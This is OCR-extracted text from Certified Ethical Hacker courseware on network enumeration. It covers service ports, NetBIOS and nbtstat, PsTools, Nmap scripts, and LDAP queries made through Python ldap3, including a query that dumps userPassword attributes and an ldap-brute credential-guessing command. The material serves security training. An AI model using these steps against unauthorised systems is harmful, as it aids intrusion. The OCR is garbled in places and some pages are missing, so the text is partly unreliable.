Exam 312-50 Certified Ethical Hacker
transfer, it will convert all the DNS names and IP addresses hosted by that server to ASCII text.
If the network administrators transfer can be an effective network. This information may addresses. A user can perform =
did not configure the DNS server properly, the DNS zone method to obtain information about the organization’s include lists of all named hosts, sub-zones, and related IP DNS zone transfer using nslookup and dig commands.
Extract user groups from Windows To extract user groups from Windows, the attacker should have a registered ID as a user in the Active Directory. The attacker can then extract information from groups in which the user is a member by using the Windows interface or command-line method.
=
Extract usernames using SNMP
Attackers can easily guess read-only or read-write community strings by using the SNMP application programming interface (API) to extract usernames.
Module 04 Page 404
Ethical Hacking and Countermeasures Copyright © by E6-Council All Rights Reserved. Reproduction is Strictly Prohibited.
Ethical Hacking and Countermeasures Enumeration
Exam 312-50 Certified Ethical Hacker
Services and Ports to Enumerate TCP/UDP53
=
Domain Name System (DNS) Zone Transfer
fz
CE H
eal
TCP/UDP 135
.
] aS: Q
a
Lightweight Directory Access Protocol (LDAP) TCP 2049
Microsoft RPC Endpoint Mapper
Bs
Network File System (NFS)
UDP 137
[real
Tp 25
NetBIOS Name Service (NBNS)
aaa
Simple Mail Transfer Protocol (SMTP)
TCP 139
so
NetBIOS Session Service (SMB over NetBIOS)
ws)
TCP/UDP 389
Lo
TCP/UDP 162 ‘SNMP Trap
‘SMB over TCP (Direct Host)
NY
UDP
UDP 161
ie
TCP 22
TCP/UDP
445
aga
2
ISAKMP/internet Key Exchange (IKE)
‘Simple Network Management Protocol (SNMP)
500
Secure Shell (SSH)
Services and Ports to Enumerate Transmission Control Protocol (TCP) and User communications between terminals in a network.
Datagram
Protocol
(UDP)
manage
data
TCP is a connection-oriented protocol capable of carrying messages or emails over the Internet. It provides a reliable multi-process communication service in a multi-network environment. The features and functions of TCP include the following: =
Supports acknowledgement for receiving data through a sliding window acknowledgement system
=
Offers automatic retransmission of lost or acknowledged data
=
Allows addressing and multiplexing of data
=
Aconnection can be established, managed, or terminated
=
Offers quality-of-service transmission
=
Offers congestion management and flow control
UDP is a connectionless protocol that carries short messages over a computer provides unreliable service. The applications of UDP include the following: =
Audio streaming
=
Videoconferencing and teleconferencing
Module 04 Page 405
network.
It
Ethical Hacking and Countermeasures Copyright © by E6-Council All Rights Reserved. Reproduction is Strictly Prohibited.
Ethical Hacking and Countermeasures Enumeration
Exam 312-50 Certified Ethical Hacker
Services and TCP/UDP ports that can be enumerated include the following. TCP/UDP 53: DNS Zone Transfer
The DNS resolution process establishes communication between DNS clients and DNS servers. DNS clients send DNS messages to DNS servers listening on UDP port 53. If the DNS message size exceeds the default size of UDP (512 octets), the response contains only the data that UDP can accommodate, and the DNS server sets a flag to indicate the truncated response. The DNS client can now resend the request via TCP over port 53 to the DNS server. In this approach, the DNS server uses UDP as a default protocol. In the case of lengthy queries for which UDP fails, TCP is used as a failover solution. Malware such as ADM worm and Bonk Trojan uses port 53 to exploit vulnerabilities within DNS servers, helping intruders launch attacks. TCP/UDP 135: Microsoft RPC Endpoint Mapper
Source: https://docs.microsoft.com RPC is a protocol used by a client system to request a service from a server. An endpoint is the protocol port on which the server listens for the client’s RPCs. The RPC Endpoint Mapper enables RPC clients to determine the port number currently assigned to a specific RPC service. There is a flaw in the part of RPC that exchanges messages over TCP/IP. The incorrect handling of malformed messages causes failure. This affects the RPC Endpoint Mapper, which listens on TCP/IP port 135. This vulnerability could allow an attacker to send RPC messages to the RPC Endpoint Mapper process on a server to launch a denialof-service (DoS) attack. UDP 137: NetBIOS Name Service (NBNS) NBNS, also known as the Windows Internet Name Service (WINS), provides a nameresolution service for computers running NetBIOS. NetBIOS name servers maintain a database of the NetBIOS names for hosts and the corresponding IP address the host is using. NBNS aims to match IP addresses with NetBIOS names and queries. Attackers usually attack the name service first. Typically, NBNS uses UDP 137 as its transport protocol. It can also use TCP 137 as its transport protocol for a few operations, though this might never occur in practice.
TCP 139: NetBIOS Session Service (SMB over NetBIOS) TCP 139 is perhaps the most well-known Windows port. It is used to transfer files over a network. Systems use this port for both null-session establishment as well as file and printer sharing. A system administrator considering the restriction of access to ports ona Windows system should make the restriction of TCP 139 a top priority. An improperly configured TCP 139 port can allow an intruder to gain unauthorized access to critical system files or the complete file system, resulting in data theft or other malicious activities. TCP/UDP 445: SMB over TCP (Direct Host) Windows supports file- and printer-sharing traffic using the SMB protocol directly hosted on TCP. In earlier OSs, SMB traffic required the NetBIOS over TCP (NBT) protocol to work Module 04 Page 406
Ethical Hacking and Countermeasures Copyright © by EC-Council
All Rights Reserved. Reproduction is Strictly Prohibited.
Ethical Hacking and Countermeasures Enumeration
Exam 312-50 Certified Ethical Hacker
on TCP/IP transport. Directly hosted SMB traffic uses port 445 (TCP and UDP) instead of NetBIOS.
UDP 161: Simple Network Management Protocol (SNMP) SNMP is widely used in network management systems to monitor network-attached devices such as routers, switches, firewalls, printers, and servers. It consists of a manager and agents. The agent receives requests on port 161 from the managers and responds to the managers on port 162. TCP/UDP 389: Lightweight Directory Access Protocol (LDAP) LDAP is a protocol for accessing and maintaining distributed directory information services over an IP network. By default, LDAP uses TCP or UDP as its transport protocol over port 389. TCP 2049: Network File System (NFS) NFS protocol is used to mount file systems on a remote host over a network, and users can interact with the file systems as if they are mounted locally. NFS servers listen to its client systems on TCP port 2049. If NFS services are not properly configured, then attackers may exploit the NFS protocol to gain control over a remote system, perform privilege escalation, inject backdoors or malware on a remote host, etc. TCP 25: Simple Mail Transfer Protocol (SMTP) SMTP is a TCP/IP mail delivery protocol. It transfers email across the Internet and across local networks. It runs on the connection-oriented service provided by TCP and uses the well-known port number 25. Below table lists some commands used by SMTP and their respective syntaxes. Hello
HELO
From
MAIL
FROM:
Recipient
RCPT
TO:
Data
DATA
Reset
RESET
Verify
VRFY
Expand
EXPN
Help
HELP[string]
Quit
QUIT Table 4.1: SMTP commands and their respective syntaxes
TCP/UDP 162: SNMP Trap
An SNMP trap uses TCP/UDP port 162 to send notifications such as optional variable bindings and the sysUpTime value from an agent to a manager.
Module 04 Page 407
Ethical Hacking and Countermeasures Copyright © by EC-Council
All Rights Reserved. Reproduction is Strictly Prohibited.
Ethical Hacking and Countermeasures Enumeration
=
Exam 312-50 Certified Ethical Hacker
UDP 500: Internet Security Association and Key Management Protocol (ISAKMP)/Internet Key Exchange (IKE)
Internet Security Association and Key Management Protocol (ISAKMP)/Internet Key Exchange (IKE) is a protocol used to set up a security association (SA) in the IPsec protocol suite. It uses UDP port 500 to establish, negotiate, modify, and delete SAs and cryptographic keys in a virtual private network (VPN) environment. =
TCP 22: Secure Shell (SSH) Secure Shell (SSH) is a command-level protocol mainly used for managing various networked devices securely. It is generally used as an alternative protocol to the unsecure Telnet protocol. SSH uses the client/server communication model, and the SSH server, by default, listens to its client on TCP port 22. Attackers may exploit the SSH protocol by brute-forcing SSH login credentials.
=
TCP/UDP 3268: Global Catalog Service Microsoft’s Global Catalog server, a domain controller that stores extra information, uses port 3268. Its database contains rows for every object in the entire organization, instead of rows for only the objects in one domain. Global Catalog allows one to locate objects from any domain without having to know the domain name. LDAP in the Global Catalog server uses port 3268. This service listens to port 3268 through a TCP connection. Administrators use port 3268 for troubleshooting issues in the Global Catalog by connecting to it using LDP.
=
TCP/UDP 5060, 5061: Session Initiation Protocol (SIP) The Session Initiation Protocol (SIP) is a protocol used in Internet telephony for voice and video calls. It typically uses TCP/UDP port 5060 (non-encrypted signaling traffic) or 5061 (encrypted traffic with TLS) for SIP to servers and other endpoints.
=
TCP 20/21: File Transfer Protocol FTP is a connection-oriented protocol used for transferring files over the Internet and private networks. FTP is controlled on TCP port 21, and for data transmission, FTP uses TCP port 20 or some dynamic port numbers depending on the server configuration. If attackers identify that FTP server ports are open, then they perform enumeration on FTP to find information such as the software version and state of existing vulnerabilities to perform further exploitations such as the sniffing of FTP traffic and FTP brute-force attacks.
=
TCP 23: Telnet The Telnet protocol is used for managing various networked devices remotely. It is an unsecure protocol because it transmits login credentials in the cleartext format. Therefore, it is mostly used in private networks. The Telnet server listens to its clients on port 23. Attackers can take advantage of the Telnet protocol to perform banner grabbing on other protocols such as SSH and SMTP, brute-forcing attacks on login credentials, portforwarding attacks, etc.
Module 04 Page 408
Ethical Hacking and Countermeasures Copyright © by E6-Council All Rights Reserved. Reproduction is Strictly Prohibited.
Ethical Hacking and Countermeasures Enumeration
=
Exam 312-50 Certified Ethical Hacker
UDP 69: Trivial File Transfer Protocol (TFTP) TFTP is a connectionless protocol used for transferring files over the Internet. TFTP depends on connectionless UDP; therefore, it does not guarantee the proper transmission of the file to the destination. TFTP is mainly used to update or upgrade software and firmware on remote networked devices. It uses UDP port 69 for transferring files to a remote host. Attackers may exploit TFTP to install malicious software or firmware on remote devices.
=
TCP 179: Border Gateway Protocol (BGP)
BGP is widely used by Internet service providers (ISPs) to maintain huge routing tables and for efficiently processing Internet traffic. BGP routers establish sessions on TCP port 179. The misconfiguration of BGP may lead to various attacks such as dictionary attacks, resource-exhaustion attacks, flooding attacks, and hijacking attacks.
Module 04 Page 409
Ethical Hacking and Countermeasures Copyright © by E6-Council All Rights Reserved. Reproduction is Strictly Prohibited.
Ethical Hacking and Countermeasures Enumeration
Exam 312-50 Certified Ethical Hacker
C/EH
LO#02: Demonstrate Different Techniques for NetBIOS Enumeration
Al RightsReserved. Re
NetBIOS Enumeration @
nis Strictly Prohibit
CE H
A NetBIOS name is a unique 16 ASCII character string used to identify the network devices over TCP/IP; fifteen characters are used for the device name, and the sixteenth character is reserved for the service or name record type
NetBIOS
Attackers use the NetBIOS enumeration to obtain
© Thelist of computers that belongto a domain © Thelist of sharesonthe individual hostsin the network © Policies and passwords
one
name list
Information Obtained
UNIQUE GROUP UNIQUE UNIQUE
Hostname Domain name Messenger service running forthe computer Messenger service running for the logged-in user
UNIQUE
Server service running
GROUP
Master browser name for the subnet.
oom
UNIQUE
Domain master browser name, identifies the
host name>
primary domain controller (PDC) forthe domain
Note: NetBIOS name resolutionis not supported by Microsoft for Internet Protocol Version 6 (IPv6)
Module 04 Page 410
Ethical Hacking and Countermeasures Copyright © by E6-Council All Rights Reserved. Reproduction is Strictly Prohibited.
Ethical Hacking and Countermeasures Enumeration
Exam 312-50 Certified Ethical Hacker
NetBIOS Enumeration (Cont’d)
if :
@ The nbtstat utility in Windows displays NetBIOS over TCP/IP (NetBT) protocol statistics, NetBIOS name tables for both the local and remote computers, and the NetBIOS name cache @ Runthe nbtstat command “nbtstat ~ a "”to obtain the NetBIOS name table of a remote computer
@ Runthe nbtstat command “nbtstat -c" to obtain the contents of the NetBIOS name cache, table of NetBIOS names, and their resolved IP addresses Administrator: Command Prompt
Copyright © by
NetBIOS Enumeration This section describes NetBIOS enumeration, the information obtained, and various NetBIOS enumeration tools. NetBIOS is considered first for enumeration because it extracts a large amount of sensitive information about the target network, such as users and network shares.
The first step in enumerating a Windows system is to take advantage of the NetBIOS API. NetBIOS was originally developed as an API for client software to access local area network (LAN) resources. Windows uses NetBIOS for file and printer sharing. The NetBIOS name is a unique 16character ASCII string assigned to Windows systems to identify network devices over TCP/IP; 15 characters are used for the device name, and the 16th is reserved for the service or record type. NetBIOS uses UDP port 137 (name services), UDP port 138 (datagram services), and TCP port 139 (session services). Attackers usually target the NetBIOS service because it is easy to exploit and run on Windows systems even when not in use. Attackers use NetBIOS enumeration to obtain the following: =
The list of computers that belong to a domain
=
The list of shares on the individual hosts in a network
=
Policies and passwords
An attacker who finds a Windows system with port 139 open can check to see which resources can be accessed or viewed on a remote system. However, to enumerate the NetBIOS names, the
remote system must have enabled file and printer sharing. NetBIOS enumeration may allow an attacker to read or write to a remote computer system, depending on the availability of shares, or launch a DoS attack.
Module 04 Page 411
Ethical Hacking and Countermeasures Copyright © by EC-Council All Rights Reserved. Reproduction is Strictly Prohibited
Ethical Hacking and Countermeasures Enumeration
Name
NetBIOS
Exam 312-50 Certified Ethical Hacker
5 . Information Obtained
Code
Type
UNIQUE
| Hostname
GROUP
Domain
UNIQUE | Messenger service running for the computer
UNIQUE | Messenger service running for the logged-in user
|
name
| UNIQUE | Server service running
GROUP | Master browser name for the subnet
'
UNIQUE Q
GROUP | Browser service elections
Domain master browser name, which identifies the primary domain controller (PDC) for the domain
Table 4.2: NetBIOS name list
Note that Microsoft does not support NetBIOS name resolution for IPv6. Nbtstat Utility
Source: https://docs.microsoft.com Nbtstat is a Windows utility that helps in troubleshooting The nbtstat command removes and corrects preloaded switches. Attackers use Nbtstat to enumerate information protocol statistics, NetBIOS name tables for both local and name cache.
NETBIOS name resolution problems. entries using several case-sensitive such as NetBIOS over TCP/IP (NetBT) remote computers, and the NetBIOS
The syntax of the nbtstat command is as follows: nbtstat [-a RemoteName] [-S] [Interval]
[-A
IP
Address]
[-c]
[-n]
[-r]
[-R]
[-RR]
[-s]
The table shown below lists various Nbtstat parameters and their respective functions. Nbtstat
Function
Parameter -a
RemoteName
Displays the NetBIOS name table of a remote computer, where RemoteName is the NetBIOS computer name of the remote computer
-A
IP
Displays the NetBIOS name table of a remote computer, specified by the IP address (in dotted decimal notation) of the remote computer
Address
-c
Lists the contents of the NetBIOS name cache, the table of NetBIOS names and
their resolved IP addresses
na
Displays the names registered locally by NetBIOS applications such as the server and redirector
“xr
Displays a count of all names resolved by a broadcast or WINS server
Module 04 Page 412
Ethical Hacking and Countermeasures Copyright © by EC-Council All Rights Reserved. Reproduction is Strictly Prohibited.
Ethical Hacking and Countermeasures Enumeration
-R -RR
Exam 312-50 Certified Ethical Hacker
Purges the name cache and reloads all #PRE-tagged entries from the Lmhosts file Releases and re-registers all names with the name server
-s
Lists the NetBIOS sessions table converting destination IP addresses to computer
-s
Lists the current NetBIOS sessions and their status with the IP addresses
Interval
NetBIOS names
Re-displays selected statistics, pausing at each display for the number of seconds specified in Interval Table 4.3: Nbtstat parameters and their respective functions
The following are some examples for nbtstat commands. =
The nbtstat command “nbtstat -a ” can
x
Figure 4.1: Nbtstat command to obtain the name table of a remote system
=
The nbtstat command “nbtstat -c” can be executed to obtain the contents of the NetBIOS name cache, the table of NetBIOS names, and their resolved IP addresses. IB¥ Administrator: Command Prompt
-
ao
x
Figure 4.2: Nbtstat command to obtain the contents of the NetBIOS name table
Module 04 Page 413
Ethical Hacking and Countermeasures Copyright © by EC-Council All Rights Reserved. Reproduction is Strictly Prohibited
Ethical Hacking and Countermeasures Enumeration
Exam 312-50 Certified Ethical Hacker
NetBIOS Enumeration Tools NetBIOS Enumerator
NetBIOS Enumerator helps to enumerate details, such
|ssetios names, Usemames, Domain sas end MAC addresses, for a given range of IP addresses
CE H
Nmap| targets’ Nmo@’snbstat NS script allow attackers to retrieve NetBIOS namesan addresses
‘Obtain information, such as NetBIOS names, Usernames, domain ‘names, and MAC ‘addresses
etp//notenum sourceforge.net Other NetBIOS
Global Network Inventory
Enumeration Tools: ittp/wmmognetosof.com
Advanced IP Scanner
Hyena
Nsauditor Network Security Auditor
‘ee://uona obvancedip-scanner.com —https://wwu.systemtools.com —https://www.nsoudtor.com Copyright © by
Al Rights Reserved. Reproduction i
NetBIOS Enumeration Tools NetBIOS enumeration tools explore and scan a network within a given range of IP addresses and lists of computers to identify security loopholes or flaws in networked systems. These tools also enumerate operating systems (OSs), users, groups, Security Identifiers (SIDs), password policies, services, service packs and hotfixes, NetBIOS shares, transports, sessions, disks and security event logs, etc. =
NetBIOS Enumerator
Source: http://nbtenum.sourceforge.net NetBIOS Enumerator is an support and to deal with screenshot, attackers use names, usernames, domain range of IP addresses.
Module 04 Page 414
enumeration tool that shows how to use remote network some other web protocols, such as SMB. As shown in the NetBIOS Enumerator to enumerate details such as NetBIOS names, and media access control (MAC) addresses for a given
Ethical Hacking and Countermeasures Copyright © by E6-Council All Rights Reserved. Reproduction is Strictly Prohibited.
Ethical Hacking and Countermeasures Enumeration
Exam 312-50 Certified Ethical Hacker
#2 Ne05Enumentr
-
setwer_|
0
x
Debug window Scanning fon: 10,10.1.15 tor 10.10.1.23 Ready! Attackers specify an IP range to
©
WD Mac: 02-15-54-13-248 & Round Trp Tene (RTT): O ms -Tme To Live (TT): 128 10.10,1.22 (SERVER2022} ‘SERVER2022 - Workstation Service
enumerate NetBIOS information Obtain information, such
Cot-Doman None CEA - Domain Contraber SERVER2022 - Fle Server Service By CEH - Domain Master Bromser [F Username: vo one loggedon) & paDoman: CoH
as NetBIOS names,
WY MAC: 00-15-54-01-8002 & Rou Trp nd Tene (RTT: O ms -Tm To Livee(TT): 128
usernames, domain names, and MAC
addresses
Figure 4.3: Screenshot of NetBIOS Enumerator
=
Nmap Source: https://nmap.org Attackers use the Nmap Scripting Engine (NSE) for discovering NetBIOS shares on a network. The NSE nbstat script allows attackers to retrieve the target’s NetBIOS names and MAC addresses. By default, the script displays the name of the computer and the logged-in user. However, if the verbosity is turned up, it displays all names related to that system.
As shown in the screenshot, an attacker uses the following Nmap command to perform NetBIOS enumeration on a target host: nmap
Module 04 Page 415
-sV
-v
--script
nbstat.nse
Ethical Hacking and Countermeasures Copyright © by E6-Council All Rights Reserved. Reproduction is Strictly Prohibited.
Ethical Hacking and Countermeasures Enumeration
File
Edit
View
Exam 312-50 Certified Ethical Hacker
Search
Terminal
Help
attacker@
nbstat.nse -sV -v --script nmap ( https://nmap.org Starting Nmap 7.92 for scanning. Loaded 46 scripts INSE:
INSE:
Script
10.10.1.22 ) at 2022-03-21
03:31
EDT
Pre-scanning.
Initiating NSE at 03:31 Completed NSE at 03: Initiating NSE at 03:31 Completed NSE at 03:31,
©.00s
elapsed
0.00s
elapsed
ermina Help B389/tcp
pervice
1
open
Info:
ms-wbt-server
Host:
SERVER2@22;
lost script result nbstat: NetBIOS name: 1.0602
Microsoft
0S:
SERVER2022,
Terminal
Windows;
NetBIOS
CPE:
user:
Services
cpe:/o:microsoft:windows
,
NetBIOS
MAC:
00:15:
(Microsoft)
1 : SERVER2022 J J SERVER2022 | CEH J CEH j_CEH
Flags: Flags: Flags: Flags: Flags:
Figure 4.5: Screenshot of Nmap NetBIOS enumeration output
The following are some additional NetBIOS enumeration tools:
=
Global Network Inventory (http://www.magnetosoft.com)
=
Advanced IP Scanner (https://www.advanced-ip-scanner.com)
=
Hyena (https://www.systemtools.com)
=
Nsauditor Network Security Auditor (https://www.nsauditor.com)
Module 04 Page 416
Ethical Hacking and Countermeasures Copyright © by EC-Council All Rights Reserved. Reproduction is Strictly Prohibited
Ethical Hacking and Countermeasures Enumeration
Exam 312-50 Certified Ethical Hacker
Enumerating User Accounts
CE H
@ Enumerating user accounts using the PsTools suite helps to control and manage remote systems from the command line PsExec - executes processes remotely
PsList - lists detailed information about processes
PsFile - shows files opened remotely
PsLoggedOn - shows who is logged on locally and Via resourcesharing
PsGetSid- displays the SID of a computeror user
PsLoglist - dumps event log records
Pskill - kills processes by name or process ID
PsPasswd - changes account passwords PsShutdown - shuts down and optionally reboots a
Psinfo- lists information about a system
computer
ttps:/fdocs microsoft.com
Enumerating User Accounts
Source: https://docs.microsoft.com Enumerating user accounts using the PsTools suite helps in controlling and managing remote systems from the command line. The following are some commands for enumerating user
accounts.
PsExec
PsExec is a lightweight Telnet replacement that can execute processes on other systems, complete with full interactivity for console applications, without having to install client software manually. PsExec’s most powerful use case is the launch of interactive command prompts on remote systems and remote-enabling tools such as ipconfig that otherwise cannot show information about remote systems. The syntax of the PsExec command is as follows: psexec n
[\\computer[,computer2[,...] s][-r
executable
servicename] [-f|-v]][-w
[-h]
[-1]
directory]
|
@file]][-u
[-s|-e]
[-d]
[-x]
user
[-i
[-]
[-p
psswd]
[-
[session]][-c [-a
n,n,...]
cmd
[arguments]
PsFile PsFile is a command-line utility that shows a list of files on a system that opened remotely, and it can close opened files either by name or by a file identifier. The default behavior of PsFile is to list the files on the local system opened by remote systems. Typing a command followed by "-" displays information on the syntax for that command.
Module 04 Page 417
Ethical Hacking and Countermeasures Copyright © by EC-Council
All Rights Reserved. Reproduction is Strictly Prohibited.
Ethical Hacking and Countermeasures Enumeration
Exam 312-50 Certified Ethical Hacker
The syntax of the PsFile command is as follows: psfile
[\\RemoteComputer
[-c]]
=
[-u
Username
[-p
Password]]]
[[Id
|
path]
PsGetSid PsGetSid translates SIDs to their display name and vice versa. It works on built-in accounts, domain accounts, and local accounts. It also displays the SIDs of user accounts and translates an SID into the name that represents it. It works across the network to query SIDs remotely. The syntax of the PsGetSid command is as follows: psgetsid
[\\computer[,computer[,...]
password]]]
=
|
@file]
[-u
username
[-p
[account|SID]
PsKill PsKill is a kill utility that can kill processes on remote systems and terminate processes on the local computer. Running PskKill with a process ID directs it to kill the process of that ID on the local computer. If a process name is specified, PsKill will kill all processes that have that name. One need not install a client on the target computer to use PsKill to terminate a remote process. The syntax of the PskKill command is as follows: pskill name |
=
[- ] [-t] [\\computer process id>
[-u
username]
[-p
password]]
Start Scanning Il
Host name
Uptime
Server2019
2890148822 (33, Hardware Inte ‘As Web (HTTP)
Remote Suspend / Hibernate Assign Friendly Name Send Message. Create Batch File Delete from List
Ready
x
) SO ONMSO®
|OpenDevice Copy Properties Rescan Device Setup Fiter Wake-On-LAN Remote Shutdown
Q ss. Dy Users
o
>] >) >] >|
System Descri. System Contact _ System Location
AsSecure Web (HTTPS) ‘As File Server (FTP) AsTelnet AsTelnetto.. Computer Management Remote Desktop
Chis Ceo
6/6
Figure 4.12: Screenshot of SoftPerfect Network Scanner
The following are some additional SNMP enumeration tools: =
Network Performance Monitor (https://www.solarwinds.com)
=
OpUtils (https://www.manageengine.com)
=
PRTG Network Monitor (https://www.paessler.com)
=
Engineer’s Toolset (https://www.solarwinds.com)
Module 04 Page 431
Ethical Hacking and Countermeasures Copyright © by E6-Council All Rights Reserved. Reproduction is Strictly Prohibited.
Ethical Hacking and Countermeasures
Exam 312-50 Certified Ethical Hacker
Enumeration
C/EH
LO#04: Use Different Techniques for LDAP Enumeration
Al Rights Reserved. Reproduction i Stricty Prohibited
LDAP Enumeration
CE H
Lightweight directory access protocol (LDAP) is an Internet protocolfor accessing distributeddirectory services Directory services may provide any organized set of records, often ina hierarchical and logical structure, such as a corporate email directory
rd
A clientstarts a LDAP session by connecting toa directory system agent (DSA) on TCP port 389 and then sendsan operation request to the DSA Information is transmitted between the client and server using basic encoding rules (BER)
SI
Attackers query the LDAP service to gather information, suchas valid usernames, addresses, and departmental details, which can be further used to perform attacks
served Reproduction i
LDAP Enumeration Various protocols enable communication and manage data transfer between network resources. All these protocols carry valuable information about network resources along with the data. An external user who successfully enumerates that information by manipulating the protocols can break into the network and may misuse the network resources. The Lightweight Directory Access Protocol (LDAP) is one such protocol that accesses the directory listings. This section focuses on
Module 04 Page 432
Ethical Hacking and Countermeasures Copyright © by EC-Council
All Rights Reserved. Reproduction is Strictly Prohibited.
Ethical Hacking and Countermeasures Enumeration
Exam 312-50 Certified Ethical Hacker
LDAP enumeration, the information extracted via LDAP enumeration, tools.
and
LDAP enumeration
LDAP is an Internet protocol for accessing distributed directory services. LDAP accesses directory listings within Active Directory or from other directory services. LDAP is a hierarchical or logical form of a directory, similar to a company’s organizational chart. Directory services may provide any organized set of records, often in a hierarchical and logical structure, such as a corporate email directory. It uses DNS for quick lookups and the fast resolution of queries. A client starts an LDAP session by connecting to a Directory System Agent (DSA), typically on TCP port 389, and sends an operation request to the DSA. The Basic Encoding Rules (BER) format is used to transmit information between the client and server. An attacker can anonymously query the LDAP service for sensitive information such as usernames, addresses, departmental details, and server names, which an attacker can use to launch attacks.
Module 04 Page 433
Ethical Hacking and Countermeasures Copyright © by E6-Council All Rights Reserved. Reproduction is Strictly Prohibited.
Ethical Hacking and Countermeasures Enumeration
Exam 312-50 Certified Ethical Hacker
Manual and Automated
LDAP
Enumeration
Manual LDAP Enumeration @ Attackers perform manual LDAP enumeration using Python to fetch information such as the domain name, naming context, and directory objects
Automated LDAP Enumeration @ Attackers use the Idap-brute NSE script to brute-force LDAP authentication
Copyright © by
Alig
iy Prohibited.
Manual and Automated LDAP Enumeration Attackers can use both manual and automated approaches for LDAP enumeration. Some of the commands that can be used for LDAP enumeration are as follows. Manual LDAP Enumeration Attackers can perform manual LDAP enumeration using Python. Follow the steps given below to perform manual LDAP enumeration using Python. 1.
Using Nmap, check whether the target LDAP server is listening on port 389 for LDAP and port 636 for secure LDAP.
2.
If the target server is listening on the specified ports, initiate the enumeration process by installing LDAP using the following command: pip3
install
ldap3
3.
As shown in the code given below, create a server object (server), specify the target IP address or hostname and port number. If the target server is listening on secure LDAP, specify use_ssl = True.
4.
Retrieve the Directory System Agent specifying get_info = ldap3.ALL.
5.
Now, create a connection object, connection, and initiate a call to bind ().
Module 04 Page 434
(DSA)-specific entry
(DSE)
naming
contexts
by
Ethical Hacking and Countermeasures Copyright © by EC-Council All Rights Reserved. Reproduction is Strictly Prohibited
Ethical Hacking and Countermeasures Enumeration
6.
Exam 312-50 Certified Ethical Hacker
If the connection is successful, True is displayed on the screen as follows: >>>
import
ldap3
>>> server = ldap3.ALL, port
I1dap3.Server('Target =389)
>>>
connection
=
ldap3.Connection
>>>
connection.bind()
IP
Address',
get_info
(server)
True
7.
Now, one can fetch information such as the domain name and naming context using the following script: >>>
server.info
ord for attacker arrot #python3 Python 3.9.2 (default, Feb 28 2621, 17:03:44) [GCC 1 26210110] on Linux Type "help", "copyright", "credits" or "license" for more information import dap3 > server=ldap3.Server('10.10.1.22',get_info=ldap3.ALL, port= > connection=1dap3.Connection(server) ‘onnection.bind() True >>>
server.info
DSA info (from DSE) Supported LDAP ver laming contexts
onfigur schema, For Supported 1 1 1 1.2.840. 1.2 1
CN=Config
=CEH, DC=com 3 -
zs i
113556
8
Verify name - Control - MICRO! Domain scope - Control - MICR Search options - Control ODC DCPROMO - Control Permissive modify - Control - MICROSOFT
Attribute scoped query - Control - MICROSOFT MICROSOET Control. liser quota.
Figure 4.13: Screenshot showing LDAP enumeration using Python script
Module 04 Page 435
Ethical Hacking and Countermeasures Copyright © by EC-Council All Rights Reserved. Reproduction is Strictly Prohibited
Ethical Hacking and Countermeasures Enumeration
8.
Exam 312-50 Certified Ethical Hacker
After obtaining the naming context, retrieve all the directory objects using the script given below: >>> connection.search (search_base='DC=DOMAIN,DC=DOMAIN', search filter='(&(objectClass=*))', search_scope='SUBTREE', attributes='*') True
>>
connection.entries
Search Terminal Help >>> connection. search(search_base='DC=CEH,DC=com',
IBTREE'
, attributes='*')
True. swconnection. entries] [DN: DC=CEH,DC=com ‘ATUS: auditingPol
reationTime:
dSASignature:
Read - READ TIME:
search
filter='(&(objectclass=*))',search_scope='SU)
2022-03-29T06:50:11.036562
132930309893191915
b'\xO1\x80\x00\x00(\x00\x00\x00\ x00\x80\ x00\x00\ x00\ x00\x00\ x00\x00\x80\x00\x00\ x06}
x00\x00\Xx00\x9e\x89\xc2D\xF5!\x9fM\x9cd\
opagationData:
16010101000000.0Z
Dcm o c = C D , H CN=NTDS Settings, Ch E C = C D , n o i bnfigurat ff 45F 9 . 4 o 5 2 g 8 D o 6 1 L 3 1 e 0 c 2 r D 7 fo 33 B2F340-@16 gPLink: Ty[pLeD:AP: //CN={31 instance lSystem5Object: isCriticOabservationWindo TRUE 00000000 0 8 lockOut ation: 1 8000000000 1 ockoutDur d: utThreshol 0 JER2 By: CN=NTDS Settir ‘ation, DC=CEH, DC=c 808 e 5 g 7 A 7 d 4 w 5 P 8 x 6 a 3 0 m : e g A d w minP @ : h t g n minPwdLe ount: 0 om: modifiedC tLa1stPr dCountA e i f i d o m
ot Termin
xd8X\x91dB\xbf
C
>
9}, F 4 8 9 B F 4 O C -00
Sitet s r i F t faul
Nat
CN=Polic
Si t s r i F t N=Defaul
© : a t o u Q ccount 10 Quota: 1000
Figure 4.14: Screenshot showing output of LDAP enumeration 9.
Now, use the following script to dump the entire LDAP: >>
connection.search
(search_base='DC=DOMAIN,DC=DOMAIN'
search filter='(&(objectClass=person))', attributes='userPassword')
,
search_scope='SUBTREE',
True
>>>
connection.entries
Module 04 Page 436
Ethical Hacking and Countermeasures Copyright © by EC-Council All Rights Reserved. Reproduction is Strictly Prohibited
Ethical Hacking and Countermeasures Enumeration
Exam 312-50 Certified Ethical Hacker
Automated LDAP Enumeration
Source: https://nmap.org Attackers use the ldap-brute NSE script to brute-force LDAP authentication. By default, it uses the built-in username and password lists. The userdb and passdb script arguments can be employed to use custom lists. nmap -p 389 --script ldap .base='"cn=users ,dc=CEH,dc=com
PORT
STATE
389/udp open
MAC
Addre:
Nmap done: @
SERVICE
dap
00:15:5D:01:80:02
1 IP address
(Microsoft)
(1 host up) scanned in 0.21 seconds
rot
nmap -p 389 ipt_ldap-brute Starting Nmap 7.92 ( https://nmap.org Nmap scan report for 10.10.1.22 Host is up (0.0014s latency) PORT
B89/tcp
"'
ldap-brute --script-args
--script-args \dap.t ae ) at 2022-03-29 06:09 E
C=CEH,
dc=com"*
10.10.1
STATE SERVICE open
ldap
ldap-brute
cn=admin, cn=users , de é cn=adi trator, cn=use cn=webadmin,
'
}
lid credential Valid credentials Valid credentials t Valid credential => Valid credentials Valid
MAC Address Nmap
done:
‘i 1 IP
(Microsoft)
:80:02 address
(1
host
up)
scanned
Valid credenti > Valid credential Valid credential => Valid credential: in
0.46
seconds
Figure 4.15: Screenshot showing output of the Nmap Idap-brute NSE script
Module 04 Page 437
Ethical Hacking and Countermeasures Copyright © by EC-Council All Rights Reserved. Reproduction is Strictly Prohibited
Ethical Hacking and Countermeasures Enumeration
Exam 312-50 Certified Ethical Hacker
LDAP Enumeration Tools Softerra
CE H
Softerra LDAP Administrator provides various
LDAP _| features essential for LDAP development, Administrator | deployment, and the administration of directories
tps:/humueldopadministatoncom OtherLDAP
Enumeration Tools:
oan
en
AD Explorer
hetps://docs.mirosoftcom
ldapsearch
Attackers use Idapsearch for enumeratingAD users. attackers to establish a connection with an | Itallows LDAP serverto perform different searches using specific filters
